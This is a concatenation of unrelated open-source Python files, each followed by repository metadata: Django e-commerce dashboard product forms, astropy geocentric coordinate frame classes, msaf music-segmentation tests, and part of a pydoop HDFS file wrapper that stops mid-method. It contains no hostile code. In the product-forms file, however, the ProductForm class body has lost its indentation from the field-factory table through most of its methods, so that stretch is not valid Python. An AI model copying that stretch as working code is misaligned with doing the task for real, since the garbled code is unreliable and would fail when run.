            stockrecord_partners = set([form.cleaned_data.get('partner', None)
                                        for form in self.forms])
            user_partners = set(self.user.partners.all())
            if not user_partners & stockrecord_partners:
                raise exceptions.ValidationError(
                    _("At least one stock record must be set to a partner that"
                      " you're associated with."))
# Factory functions mapping a ProductAttribute to a suitable form field.
# They are wired up in ProductForm.FIELD_FACTORIES below.

def _attr_text_field(attribute):
    """Single-line text input for a 'text' attribute."""
    return forms.CharField(label=attribute.name,
                           required=attribute.required)

def _attr_textarea_field(attribute):
    """Multi-line textarea for a 'richtext' attribute."""
    return forms.CharField(label=attribute.name,
                           widget=forms.Textarea(),
                           required=attribute.required)

def _attr_integer_field(attribute):
    """Integer input for an 'integer' attribute."""
    return forms.IntegerField(label=attribute.name,
                              required=attribute.required)

def _attr_boolean_field(attribute):
    """Checkbox for a 'boolean' attribute."""
    return forms.BooleanField(label=attribute.name,
                              required=attribute.required)

def _attr_float_field(attribute):
    """Float input for a 'float' attribute."""
    return forms.FloatField(label=attribute.name,
                            required=attribute.required)

def _attr_date_field(attribute):
    """Date input for a 'date' attribute."""
    return forms.DateField(label=attribute.name,
                           required=attribute.required,
                           widget=forms.widgets.DateInput)

def _attr_option_field(attribute):
    """Single choice from the attribute's option group."""
    return forms.ModelChoiceField(
        label=attribute.name,
        required=attribute.required,
        queryset=attribute.option_group.options.all())

def _attr_multi_option_field(attribute):
    """Multiple choices from the attribute's option group."""
    return forms.ModelMultipleChoiceField(
        label=attribute.name,
        required=attribute.required,
        queryset=attribute.option_group.options.all())

def _attr_entity_field(attribute):
    # Product entities don't have out-of-the-box supported in the ProductForm.
    # There is no ModelChoiceField for generic foreign keys, and there's no
    # good default behaviour anyway; offering a choice of *all* model instances
    # is hardly useful.
    return None

def _attr_numeric_field(attribute):
    """Float input for a 'numeric' attribute.

    NOTE(review): identical to _attr_float_field; presumably a legacy
    alias for the older 'numeric' type name -- confirm before merging.
    """
    return forms.FloatField(label=attribute.name,
                            required=attribute.required)

def _attr_file_field(attribute):
    """File upload for a 'file' attribute."""
    return forms.FileField(
        label=attribute.name, required=attribute.required)

def _attr_image_field(attribute):
    """Image upload for an 'image' attribute."""
    return forms.ImageField(
        label=attribute.name, required=attribute.required)
class ProductForm(forms.ModelForm):
FIELD_FACTORIES = {
"text": _attr_text_field,
"richtext": _attr_textarea_field,
"integer": _attr_integer_field,
"boolean": _attr_boolean_field,
"float": _attr_float_field,
"date": _attr_date_field,
"option": _attr_option_field,
"multi_option": _attr_multi_option_field,
"entity": _attr_entity_field,
"numeric": _attr_numeric_field,
"file": _attr_file_field,
"image": _attr_image_field,
}
class Meta:
model = Product
fields = [
'title', 'upc', 'description', 'is_discountable', 'structure']
widgets = {
'structure': forms.HiddenInput()
}
def __init__(self, product_class, data=None, parent=None, *args, **kwargs):
self.set_initial(product_class, parent, kwargs)
super(ProductForm, self).__init__(data, *args, **kwargs)
if parent:
self.instance.parent = parent
# We need to set the correct product structures explicitly to pass
# attribute validation and child product validation. Note that
# those changes are not persisted.
self.instance.structure = Product.CHILD
self.instance.parent.structure = Product.PARENT
self.delete_non_child_fields()
else:
# Only set product class for non-child products
self.instance.product_class = product_class
self.add_attribute_fields(product_class, self.instance.is_parent)
if 'title' in self.fields:
self.fields['title'].widget = forms.TextInput(
attrs={'autocomplete': 'off'})
def set_initial(self, product_class, parent, kwargs):
"""
Set initial data for the form. Sets the correct product structure
and fetches initial values for the dynamically constructed attribute
fields.
"""
if 'initial' not in kwargs:
kwargs['initial'] = {}
self.set_initial_attribute_values(product_class, kwargs)
if parent:
kwargs['initial']['structure'] = Product.CHILD
def set_initial_attribute_values(self, product_class, kwargs):
"""
Update the kwargs['initial'] value to have the initial values based on
the product instance's attributes
"""
instance = kwargs.get('instance')
if instance is None:
return
for attribute in product_class.attributes.all():
try:
value = instance.attribute_values.get(
attribute=attribute).value
except exceptions.ObjectDoesNotExist:
pass
else:
kwargs['initial']['attr_%s' % attribute.code] = value
def add_attribute_fields(self, product_class, is_parent=False):
"""
For each attribute specified by the product class, this method
dynamically adds form fields to the product form.
"""
for attribute in product_class.attributes.all():
field = self.get_attribute_field(attribute)
if field:
self.fields['attr_%s' % attribute.code] = field
# Attributes are not required for a parent product
if is_parent:
self.fields['attr_%s' % attribute.code].required = False
def get_attribute_field(self, attribute):
"""
Gets the correct form field for a given attribute type.
"""
return self.FIELD_FACTORIES[attribute.type](attribute)
def delete_non_child_fields(self):
"""
Deletes any fields not needed for child products. Override this if
you want to e.g. keep the description field.
"""
for field_name in ['description', 'is_discountable']:
if field_name in self.fields:
del self.fields[field_name]
    def _post_clean(self):
        """
        Set attributes before ModelForm calls the product's clean method
        (which it does in _post_clean), which in turn validates attributes.
        """
        self.instance.attr.initiate_attributes()
        for attribute in self.instance.attr.get_all_attributes():
            field_name = 'attr_%s' % attribute.code
            # An empty text field won't show up in cleaned_data.
            if field_name in self.cleaned_data:
                value = self.cleaned_data[field_name]
                setattr(self.instance.attr, attribute.code, value)
        # Only now let ModelForm run model validation, so the attribute
        # values copied above are included in that validation.
        super(ProductForm, self)._post_clean()
class StockAlertSearchForm(forms.Form):
    """Search form for filtering stock alerts by their status string."""
    status = forms.CharField(label=_('Status'))
class ProductCategoryForm(forms.ModelForm):
    """Form for a single product-to-category link row."""
    class Meta:
        model = ProductCategory
        fields = ('category', )
# Inline formset tying a product to its categories: one extra blank row,
# rows may be deleted.
BaseProductCategoryFormSet = inlineformset_factory(
    Product, ProductCategory, form=ProductCategoryForm, extra=1,
    can_delete=True)
class ProductCategoryFormSet(BaseProductCategoryFormSet):
    """
    Category formset that enforces the product-structure rules: stand-alone
    and parent products need at least one category, child products none.
    """

    def __init__(self, product_class, user, *args, **kwargs):
        # This function just exists to drop the extra arguments
        super(ProductCategoryFormSet, self).__init__(*args, **kwargs)

    def clean(self):
        num_categories = self.get_num_categories()
        if self.instance.is_child:
            if num_categories > 0:
                raise forms.ValidationError(
                    _("A child product should not have categories"))
        elif num_categories == 0:
            raise forms.ValidationError(
                _("Stand-alone and parent products "
                  "must have at least one category"))

    def get_num_categories(self):
        # Count forms that carry a category and are not flagged for deletion.
        num_categories = 0
        for form in self.forms[:self.total_form_count()]:
            data = getattr(form, 'cleaned_data', None)
            if data and data.get('category') and not data.get('DELETE', False):
                num_categories += 1
        return num_categories
class ProductImageForm(forms.ModelForm):
    """
    Form for one product image within the image formset.

    ``display_order`` is not exposed as a form field; it is inferred from
    the position of this form within the formset (see
    :meth:`get_display_order`).
    """

    class Meta:
        model = ProductImage
        fields = ['product', 'original', 'caption']
        # use ImageInput widget to create HTML displaying the
        # actual uploaded image and providing the upload dialog
        # when clicking on the actual image.
        widgets = {
            'original': ImageInput(),
        }

    def save(self, *args, **kwargs):
        # We infer the display order of the image based on the order of the
        # image fields within the formset.
        kwargs['commit'] = False
        obj = super(ProductImageForm, self).save(*args, **kwargs)
        obj.display_order = self.get_display_order()
        obj.save()
        return obj

    def get_display_order(self):
        """
        Return this form's index within the formset as an integer.

        The formset prefix ends with the form's index (e.g. "images-3").
        The index is converted to int so display_order orders numerically;
        the string value previously returned would compare
        lexicographically (e.g. "10" < "2").
        """
        return int(self.prefix.split('-')[-1])
# Inline formset for a product's images, with two blank rows by default.
BaseProductImageFormSet = inlineformset_factory(
    Product, ProductImage, form=ProductImageForm, extra=2)
class ProductImageFormSet(BaseProductImageFormSet):
    def __init__(self, product_class, user, *args, **kwargs):
        # product_class and user are accepted only for signature
        # compatibility with the other product formsets; they are unused.
        super(ProductImageFormSet, self).__init__(*args, **kwargs)
class ProductRecommendationForm(forms.ModelForm):
    """Form for a single product recommendation row."""
    class Meta:
        model = ProductRecommendation
        fields = ['primary', 'recommendation', 'ranking']
        widgets = {
            'recommendation': ProductSelect,
        }
    def __init__(self, *args, **kwargs):
        super(ProductRecommendationForm, self).__init__(*args, **kwargs)
        # Enhance the recommendation widget with the select2 JS behaviour.
        self.fields['recommendation'].widget.attrs['class'] = "select2"
# Inline formset for up to five recommendations; fk_name picks which of the
# form's product foreign keys ties the formset to the parent product.
BaseProductRecommendationFormSet = inlineformset_factory(
    Product, ProductRecommendation, form=ProductRecommendationForm,
    extra=5, fk_name="primary")
class ProductRecommendationFormSet(BaseProductRecommendationFormSet):
    def __init__(self, product_class, user, *args, **kwargs):
        # product_class and user are accepted only for signature
        # compatibility with the other product formsets; they are unused.
        super(ProductRecommendationFormSet, self).__init__(*args, **kwargs)
class ProductClassForm(forms.ModelForm):
    """Form for creating and editing a product class."""
    class Meta:
        model = ProductClass
        fields = ['name', 'requires_shipping', 'track_stock', 'options']
class ProductAttributesForm(forms.ModelForm):
    """
    Form for one attribute of a product class. The attribute code may be
    left blank; a slug derived from the name is used instead.
    """

    def __init__(self, *args, **kwargs):
        super(ProductAttributesForm, self).__init__(*args, **kwargs)
        # because we'll allow submission of the form with blank
        # codes so that we can generate them.
        self.fields["code"].required = False
        self.fields["option_group"].help_text = _("Select an option group")

    def clean_code(self):
        code = self.cleaned_data.get("code")
        if code:
            return code
        title = self.cleaned_data.get("name")
        # Fall back to a slug of the name; if neither is present, return
        # the (blank) code unchanged.
        return slugify(title) if title else code

    class Meta:
        model = ProductAttribute
        fields = ["name", "code", "type", "option_group", "required"]
# Formset for editing a product class's attributes; blank codes are allowed
# and generated from the name by ProductAttributesForm.clean_code.
ProductAttributesFormSet = inlineformset_factory(ProductClass,
                                                 ProductAttribute,
                                                 form=ProductAttributesForm,
                                                 extra=3)
| {
"content_hash": "c47858ea8f156c4c176df57571053073",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 87,
"avg_line_length": 35.80962343096234,
"alnum_prop": 0.6164631652742887,
"repo_name": "okfish/django-oscar",
"id": "bc93f02d44d7b89d50904e18fa369a414c6ee298",
"size": "17117",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/oscar/apps/dashboard/catalogue/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "542048"
},
{
"name": "HTML",
"bytes": "498872"
},
{
"name": "JavaScript",
"bytes": "423552"
},
{
"name": "Makefile",
"bytes": "2653"
},
{
"name": "Python",
"bytes": "1738863"
},
{
"name": "Shell",
"bytes": "2751"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, unicode_literals, division,
print_function)
from ... import units as u
from ..representation import SphericalRepresentation
from ..baseframe import (BaseCoordinateFrame, RepresentationMapping,
TimeFrameAttribute,
CartesianRepresentationFrameAttribute)
from .utils import DEFAULT_OBSTIME, EQUINOX_J2000
class GCRS(BaseCoordinateFrame):
    """
    A coordinate or frame in the Geocentric Celestial Reference System (GCRS).

    GCRS is distinct from ICRS mainly in that it is relative to the Earth's
    center-of-mass rather than the solar system Barycenter. That means this
    frame includes the effects of aberration (unlike ICRS). For more background
    on the GCRS, see the references provided in the
    :ref:`astropy-coordinates-seealso` section of the documentation. (Of
    particular note is Section 1.2 of
    `USNO Circular 179 <http://aa.usno.navy.mil/publications/docs/Circular_179.php>`_)

    This frame also includes frames that are defined *relative* to the Earth,
    but that are offset (in both position and velocity) from the Earth.

    This frame has these frame attributes:

    * ``obstime``
        The time at which the observation is taken. Used for determining the
        position of the Earth.
    * ``obsgeoloc``
        The position of the observer relative to the center-of-mass of the
        Earth, oriented the same as BCRS/ICRS. Either [0, 0, 0],
        `~astropy.coordinates.CartesianRepresentation`, or proper input for one,
        i.e., a `~astropy.units.Quantity` with shape (3, ...) and length units.
        Defaults to [0, 0, 0], meaning "true" GCRS.
    * ``obsgeovel``
        The velocity of the observer relative to the center-of-mass of the
        Earth, oriented the same as BCRS/ICRS. Either [0, 0, 0],
        `~astropy.coordinates.CartesianRepresentation`, or proper input for one,
        i.e., a `~astropy.units.Quantity` with shape (3, ...) and velocity
        units. Defaults to [0, 0, 0], meaning "true" GCRS.

    Parameters
    ----------
    representation : `BaseRepresentation` or None
        A representation object or None to have no data (or use the other keywords)
    ra : `Angle`, optional, must be keyword
        The RA for this object (``dec`` must also be given and ``representation``
        must be None).
    dec : `Angle`, optional, must be keyword
        The Declination for this object (``ra`` must also be given and
        ``representation`` must be None).
    distance : `~astropy.units.Quantity`, optional, must be keyword
        The Distance for this object along the line-of-sight.
        (``representation`` must be None).
    copy : bool, optional
        If `True` (default), make copies of the input coordinate arrays.
        Can only be passed in as a keyword argument.
    """
    # Map the generic spherical component names onto 'ra'/'dec'.
    frame_specific_representation_info = {
        'spherical': [RepresentationMapping('lon', 'ra'),
                      RepresentationMapping('lat', 'dec')]
    }
    # The unit-spherical mapping must mirror the spherical one so that
    # 'ra'/'dec' work whether or not a distance is present.
    frame_specific_representation_info['unitspherical'] = \
        frame_specific_representation_info['spherical']
    default_representation = SphericalRepresentation
    obstime = TimeFrameAttribute(default=DEFAULT_OBSTIME)
    obsgeoloc = CartesianRepresentationFrameAttribute(default=[0, 0, 0],
                                                      unit=u.m)
    obsgeovel = CartesianRepresentationFrameAttribute(default=[0, 0, 0],
                                                      unit=u.m/u.s)
# The "self-transform" is defined in icrs_cirs_transformations.py, because in
# the current implementation it goes through ICRS (like CIRS)
class PrecessedGeocentric(BaseCoordinateFrame):
    """
    A coordinate frame defined in a similar manner as GCRS, but precessed to a
    requested (mean) equinox. Note that this does *not* end up the same as
    regular GCRS even for J2000 equinox, because the GCRS orientation is fixed
    to that of ICRS, which is not quite the same as the dynamical J2000
    orientation.

    This frame has these frame attributes:

    * ``equinox``
        The (mean) equinox to precess the coordinates to.
    * ``obstime``
        The time at which the observation is taken. Used for determining the
        position of the Earth.
    * ``obsgeoloc``
        The position of the observer relative to the center-of-mass of the Earth,
        oriented the same as BCRS/ICRS. Either [0, 0, 0], `~astropy.coordinates.CartesianRepresentation`,
        or proper input for one, i.e., a `~astropy.units.Quantity` with shape (3, ...) and length units.
        Defaults to [0, 0, 0], meaning "true" Geocentric.
    * ``obsgeovel``
        The velocity of the observer relative to the center-of-mass of the Earth,
        oriented the same as BCRS/ICRS. Either [0, 0, 0], `~astropy.coordinates.CartesianRepresentation`,
        or proper input for one, i.e., a `~astropy.units.Quantity` with shape (3, ...) and velocity units.
        Defaults to [0, 0, 0], meaning "true" Geocentric.

    Parameters
    ----------
    representation : `BaseRepresentation` or None
        A representation object or None to have no data (or use the other keywords)
    ra : `Angle`, optional, must be keyword
        The RA for this object (``dec`` must also be given and ``representation``
        must be None).
    dec : `Angle`, optional, must be keyword
        The Declination for this object (``ra`` must also be given and
        ``representation`` must be None).
    distance : `~astropy.units.Quantity`, optional, must be keyword
        The Distance for this object along the line-of-sight.
        (``representation`` must be None).
    copy : bool, optional
        If `True` (default), make copies of the input coordinate arrays.
        Can only be passed in as a keyword argument.
    """
    # Same 'ra'/'dec' component naming as GCRS.
    frame_specific_representation_info = {
        'spherical': [RepresentationMapping('lon', 'ra'),
                      RepresentationMapping('lat', 'dec')]
    }
    frame_specific_representation_info['unitspherical'] = \
        frame_specific_representation_info['spherical']
    default_representation = SphericalRepresentation
    equinox = TimeFrameAttribute(default=EQUINOX_J2000)
    obstime = TimeFrameAttribute(default=DEFAULT_OBSTIME)
    obsgeoloc = CartesianRepresentationFrameAttribute(default=[0, 0, 0], unit=u.m)
    obsgeovel = CartesianRepresentationFrameAttribute(default=[0, 0, 0], unit=u.m/u.s)
| {
"content_hash": "2cc599a398bb1fdebf10547a60bc4550",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 106,
"avg_line_length": 46.827338129496404,
"alnum_prop": 0.6656936549393148,
"repo_name": "tbabej/astropy",
"id": "12e995b24f2b91752c512b7ea9ddedb5eb64696f",
"size": "6597",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "astropy/coordinates/builtin_frames/gcrs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "366874"
},
{
"name": "C++",
"bytes": "1825"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Jupyter Notebook",
"bytes": "62553"
},
{
"name": "Python",
"bytes": "7610601"
},
{
"name": "Shell",
"bytes": "425"
},
{
"name": "TeX",
"bytes": "778"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import matplotlib
# Use a non-interactive backend so the tests can run headless (e.g. on CI),
# and reset any user rc customizations before applying the test style.
matplotlib.use('Agg')
matplotlib.rcParams.update(matplotlib.rcParamsDefault)
import matplotlib.style
matplotlib.style.use('seaborn-ticks')
from mpl_ic import image_comparison
from nose.tools import assert_raises
from nose.tools import raises
import numpy.testing as npt
import os
from types import ModuleType
# Msaf imports
import msaf
from msaf.features import Features
from msaf.exceptions import (NoHierBoundaryError, FeaturesNotFound,
                             NoAudioFileError)
# Global vars
# A very short fixture (for the "too short" code paths) and a longer one
# for exercising the full algorithms.
audio_file = os.path.join("fixtures", "chirp.mp3")
long_audio_file = os.path.join("fixtures", "Sargon_test", "audio",
                               "Mindless_cut.mp3")
# Algorithm id that is guaranteed not to exist in MSAF.
fake_module_name = "fake_name_module"
def test_get_boundaries_module():
    # Check that it returns modules for all the existing MSAF boundaries algos
    bound_ids = msaf.io.get_all_boundary_algorithms()
    for bound_id in bound_ids:
        bound_module = msaf.run.get_boundaries_module(bound_id)
        assert isinstance(bound_module, ModuleType)
    # Check that "gt" returns None
    assert msaf.run.get_boundaries_module("gt") is None
    # Check that a RuntimeError is raised when calling it with non-existent
    # boundary id
    assert_raises(RuntimeError,
                  msaf.run.get_boundaries_module, fake_module_name)
    # Check that a RuntimeError is raised when calling it with invalid
    # boundary id
    assert_raises(RuntimeError,
                  msaf.run.get_boundaries_module, "fmc2d")
def test_get_labels_module():
    # Check that it returns modules for all the existing MSAF boundaries algos
    label_ids = msaf.io.get_all_label_algorithms()
    for label_id in label_ids:
        label_module = msaf.run.get_labels_module(label_id)
        assert isinstance(label_module, ModuleType)
    # Check that None returns None
    assert msaf.run.get_labels_module(None) is None
    # Check that a RuntimeError is raised when calling it with non-existent
    # labels id
    assert_raises(RuntimeError,
                  msaf.run.get_labels_module, fake_module_name)
    # Check that a RuntimeError is raised when calling it with invalid
    # labels id
    assert_raises(RuntimeError,
                  msaf.run.get_labels_module, "foote")
def test_run_algorithms():
    """Test running all the algorithms."""
    bound_ids = msaf.io.get_all_boundary_algorithms()
    label_ids = msaf.io.get_all_label_algorithms()
    # Add ground truth to boundary id
    bound_ids += ["gt"]
    # Add None to labels
    label_ids += [None]
    # Config params
    feature = "pcp"
    annot_beats = False
    framesync = False
    file_struct = msaf.io.FileStruct(audio_file)
    file_struct.features_file = msaf.config.features_tmp_file
    # Running all algorithms on a file that is too short
    for bound_id in bound_ids:
        for label_id in label_ids:
            print("bound_id: %s,\tlabel_id: %s" % (bound_id, label_id))
            config = msaf.io.get_configuration(feature, annot_beats, framesync,
                                               bound_id, label_id)
            config["hier"] = False
            config["features"] = Features.select_features(
                feature, file_struct, annot_beats, framesync)
            est_times, est_labels = msaf.run.run_algorithms(
                file_struct, bound_id, label_id, config)
            # A too-short file yields a single segment: two boundary times
            # (start, end) and exactly one label.
            assert len(est_times) == 2
            assert len(est_labels) == 1
            npt.assert_almost_equal(est_times[0], 0.0, decimal=2)
            npt.assert_almost_equal(est_times[-1], config["features"].dur,
                                    decimal=2)
    # Compute and save features for long audio file
    file_struct = msaf.io.FileStruct(long_audio_file)
    file_struct.features_file = msaf.config.features_tmp_file
    def _test_run_msaf(bound_id, label_id, hier=False):
        # Nested helper, yielded below so nose runs each algorithm
        # combination as an individual test case.
        print("bound_id: %s,\tlabel_id: %s" % (bound_id, label_id))
        config = msaf.io.get_configuration(feature, annot_beats, framesync,
                                           bound_id, label_id)
        config["hier"] = hier
        config["features"] = Features.select_features(
            feature, file_struct, annot_beats, framesync)
        est_times, est_labels = msaf.run.run_algorithms(
            file_struct, bound_id, label_id, config)
        # Take the first level if hierarchy algorithm
        if hier:
            est_times = est_times[0]
            est_labels = est_labels[0]
        npt.assert_almost_equal(est_times[0], 0.0, decimal=2)
        assert len(est_times) - 1 == len(est_labels)
        npt.assert_almost_equal(est_times[-1], config["features"].dur,
                                decimal=2)
    # Running all boundary algorithms on a relatively long file
    # Combining boundaries with labels
    for bound_id in bound_ids:
        if bound_id == "gt":
            continue
        for label_id in label_ids:
            yield (_test_run_msaf, bound_id, label_id, False)
    # Test the hierarchical algorithms
    hier_ids = ["olda", "scluster"]
    for hier_bounds_id in hier_ids:
        for hier_labels_id in hier_ids:
            # "olda" appears to be boundaries-only here; swap in "fmc2d"
            # for the labeling side.
            if hier_labels_id == "olda":
                hier_labels_id = "fmc2d"
            yield (_test_run_msaf, hier_bounds_id, hier_labels_id, True)
@raises(NoHierBoundaryError)
def test_no_bound_hierarchical():
    # Running the hierarchical pipeline without a boundary algorithm must
    # raise NoHierBoundaryError.
    msaf.run.run_hierarchical(None, None, None, None, None)
def test_no_gt_flat_bounds():
    """Make sure the results are empty if there is not ground truth found."""
    file_struct = msaf.io.FileStruct(audio_file)
    file_struct.features_file = msaf.config.features_tmp_file
    # pcp features, no beat annotations, no framesync.
    config = {
        "features": Features.select_features(
            "pcp", file_struct, False, False),
    }
    est_times, est_labels = msaf.run.run_flat(file_struct, None, None,
                                              None, config, 0)
    assert not est_times
    assert not est_labels
def test_process_track():
    # Segment a single track with Foote boundaries and no labeling algorithm.
    file_struct = msaf.io.FileStruct(audio_file)
    file_struct.features_file = msaf.config.features_tmp_file
    file_struct.est_file = "tmp.json"
    config = {
        "feature": "pcp",
        "annot_beats": False,
        "framesync": False,
        "hier": False,
    }
    est_times, est_labels = msaf.run.process_track(
        file_struct, "foote", None, config)
    # The estimations must have been written to disk; clean up afterwards.
    assert os.path.isfile(file_struct.est_file)
    os.remove(file_struct.est_file)
def test_process_with_gt():
    # Combine ground-truth boundaries with the fmc2d labeling algorithm.
    bounds_id = "gt"
    labels_id = "fmc2d"
    est_times, est_labels = msaf.run.process(
        long_audio_file, boundaries_id=bounds_id, labels_id=labels_id)
    # Estimations start at time 0 and carry one more boundary than labels
    # (each segment is delimited by two boundaries).
    assert est_times[0] == 0
    assert len(est_times) == len(est_labels) + 1
@raises(FeaturesNotFound)
def test_process_wrong_feature():
    # A non-existent feature id must raise FeaturesNotFound.
    feature = "caca"
    est_times, est_labels = msaf.run.process(long_audio_file, feature=feature)
@raises(NoAudioFileError)
def test_process_wrong_path():
    # A path that does not exist must raise NoAudioFileError.
    wrong_path = "caca.mp3"
    est_times, est_labels = msaf.run.process(wrong_path)
def test_process():
    # Run the whole pipeline with default parameters.
    est_times, est_labels = msaf.run.process(long_audio_file)
    assert est_times[0] == 0
    assert len(est_times) == len(est_labels) + 1
def test_process_sonify():
    # Sonifying the boundaries should write a wav file to disk.
    out_wav = "out_wav.wav"
    est_times, est_labels = msaf.run.process(long_audio_file,
                                             sonify_bounds=True,
                                             out_bounds=out_wav)
    assert os.path.isfile(out_wav)
    os.remove(out_wav)
# TODO: Travis
# @image_comparison(baseline_images=['run_bounds'], extensions=['png'])
# def test_process_plot():
# est_times, est_labels = msaf.run.process(long_audio_file, plot=True)
def test_process_dataset():
    # Process a whole (tiny) dataset; results come back as a list with one
    # (est_times, est_labels) tuple per audio file.
    ds_path = os.path.join("fixtures", "Sargon_test")
    res = msaf.run.process(ds_path)
    est_times, est_labels = res[0]
    assert est_times[0] == 0
    assert len(est_times) == len(est_labels) + 1
| {
"content_hash": "622f3e0d93c513a5502129ddc12ecfdb",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 79,
"avg_line_length": 34.233050847457626,
"alnum_prop": 0.632132689689318,
"repo_name": "urinieto/msaf",
"id": "8e775fa7b8daf3df926c374f98ba2d3fbf26fc09",
"size": "8176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "159218"
},
{
"name": "Python",
"bytes": "385875"
},
{
"name": "Shell",
"bytes": "1436"
}
],
"symlink_target": ""
} |
"""
pydoop.hdfs.file -- HDFS File Objects
-------------------------------------
"""
import os
import common
def _complain_ifclosed(closed):
if closed:
raise ValueError("I/O operation on closed HDFS file object")
class hdfs_file(object):
    """
    Instances of this class represent HDFS file objects.

    Objects from this class should not be instantiated directly. The
    preferred way to open an HDFS file is with the :func:`open` function;
    alternatively, :meth:`hdfs.open_file` can be used.
    """
    # Line terminator used by readline().
    ENDL = os.linesep
    def __init__(self, raw_hdfs_file, fs, name, flags, chunk_size=common.BUFSIZE):
        if not chunk_size > 0:
            raise ValueError("chunk size must be positive")
        self.f = raw_hdfs_file
        self.__fs = fs
        self.__name = fs.get_path_info(name)["name"]
        self.__size = fs.get_path_info(name)["size"]
        # Any flag other than O_RDONLY is treated as write mode.
        self.__mode = "r" if flags == os.O_RDONLY else "w"
        self.chunk_size = chunk_size
        self.closed = False
        self.__reset()
    def __reset(self):
        # Discard all line-reading state: buffered partial-line pieces, the
        # current chunk, the EOF flag and the in-chunk cursor.
        self.buffer_list = []
        self.chunk = ""
        self.EOF = False
        self.p = 0
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        self.close()
    @property
    def fs(self):
        """
        The file's hdfs instance.
        """
        return self.__fs
    @property
    def name(self):
        """
        The file's fully qualified name.
        """
        return self.__name
    @property
    def size(self):
        """
        The file's size in bytes. This attribute is initialized when the
        file is opened and updated when it is closed.
        """
        return self.__size
    @property
    def mode(self):
        """
        The I/O mode for the file.
        """
        return self.__mode
    def __read_chunk(self):
        # Pull the next chunk_size bytes from the raw reader; an empty
        # result marks EOF.
        self.chunk = self.f.read(self.chunk_size)
        self.p = 0
        if not self.chunk:
            self.EOF = True
    def __read_chunks_until_nl(self):
        # Scan forward, buffering whole chunk tails in buffer_list, until the
        # current chunk contains a line terminator or EOF is hit. Returns
        # the index of the terminator within self.chunk, or len(self.chunk)
        # if no terminator was found.
        if self.EOF:
            eol = self.chunk.find(self.ENDL, self.p)
            return eol if eol > -1 else len(self.chunk)
        if not self.chunk:
            self.__read_chunk()
        eol = self.chunk.find(self.ENDL, self.p)
        while eol < 0 and not self.EOF:
            if self.p < len(self.chunk):
                self.buffer_list.append(self.chunk[self.p:])
            self.__read_chunk()
            eol = self.chunk.find(self.ENDL, self.p)
        return eol if eol > -1 else len(self.chunk)
    def readline(self):
        """
        Read and return a line of text.

        :rtype: string
        :return: the next line of text in the file, including the newline character
        """
        _complain_ifclosed(self.closed)
        eol = self.__read_chunks_until_nl()
        # Join any buffered pieces with the final fragment, terminator included.
        line = "".join(self.buffer_list) + self.chunk[self.p:eol+1]
        self.buffer_list = []
        self.p = eol+1
        return line
    def next(self):
        """
        Return the next input line, or raise :class:`StopIteration`
        when EOF is hit.
        """
        _complain_ifclosed(self.closed)
        line = self.readline()
        if line == "":
            raise StopIteration
        return line
    def __iter__(self):
        return self
    def available(self):
        """
        Number of bytes that can be read from this input stream without blocking.

        :rtype: int
        :return: available bytes
        """
        _complain_ifclosed(self.closed)
        return self.f.available()
    def close(self):
        """
        Close the file.
        """
        if not self.closed:
            self.closed = True
            retval = self.f.close()
            if self.mode == "w":
                # Refresh the cached size: it may have grown while writing.
                self.__size = self.fs.get_path_info(self.name)["size"]
            return retval
    def pread(self, position, length):
        """
        Read ``length`` bytes of data from the file, starting from ``position``\ .

        :type position: int
        :param position: position from which to read
        :type length: int
        :param length: the number of bytes to read
        :rtype: string
        :return: the chunk of data read from the file
        """
        _complain_ifclosed(self.closed)
        return self.f.pread(position, length)
    def pread_chunk(self, position, chunk):
        """
        Works like :meth:`pread`\ , but data is stored in the writable
        buffer ``chunk`` rather than returned. Reads at most a number of
        bytes equal to the size of ``chunk``\ .

        :type position: int
        :param position: position from which to read
        :type chunk: writable string buffer
        :param chunk: a c-like string buffer, such as the one returned by the
          ``create_string_buffer`` function in the :mod:`ctypes` module
        :rtype: int
        :return: the number of bytes read
        """
        _complain_ifclosed(self.closed)
        return self.f.pread_chunk(position, chunk)
    def read(self, length=-1):
        """
        Read ``length`` bytes from the file. If ``length`` is negative or
        omitted, read all data until EOF.

        :type length: int
        :param length: the number of bytes to read
        :rtype: string
        :return: the chunk of data read from the file
        """
        _complain_ifclosed(self.closed)
        # NOTE: libhdfs read stops at block boundaries: it is *essential*
        # to ensure that we actually read the required number of bytes.
        if length < 0:
            length = self.size
        chunks = []
        while 1:
            if length <= 0:
                break
            c = self.f.read(min(self.chunk_size, length))
            if c == "":
                break
            chunks.append(c)
            length -= len(c)
        return "".join(chunks)
    def read_chunk(self, chunk):
        """
        Works like :meth:`read`\ , but data is stored in the writable
        buffer ``chunk`` rather than returned. Reads at most a number of
        bytes equal to the size of ``chunk``\ .

        :type chunk: writable string buffer
        :param chunk: a c-like string buffer, such as the one returned by the
          ``create_string_buffer`` function in the :mod:`ctypes` module
        :rtype: int
        :return: the number of bytes read
        """
        _complain_ifclosed(self.closed)
        return self.f.read_chunk(chunk)
    def seek(self, position, whence=os.SEEK_SET):
        """
        Seek to ``position`` in file.

        :type position: int
        :param position: offset in bytes to seek to
        :type whence: int
        :param whence: defaults to ``os.SEEK_SET`` (absolute); other
          values are ``os.SEEK_CUR`` (relative to the current position)
          and ``os.SEEK_END`` (relative to the file's end).
        """
        _complain_ifclosed(self.closed)
        if whence == os.SEEK_CUR:
            position += self.tell()
        elif whence == os.SEEK_END:
            position += self.size
        # Clamp negative offsets to the start of the file.
        position = max(0, position)
        # Seeking invalidates any buffered readline() state.
        self.__reset()
        return self.f.seek(position)
    def tell(self):
        """
        Get the current byte offset in the file.

        :rtype: int
        :return: current offset in bytes
        """
        _complain_ifclosed(self.closed)
        return self.f.tell()
    def write(self, data):
        """
        Write ``data`` to the file.

        :type data: string
        :param data: the data to be written to the file
        :rtype: int
        :return: the number of bytes written
        """
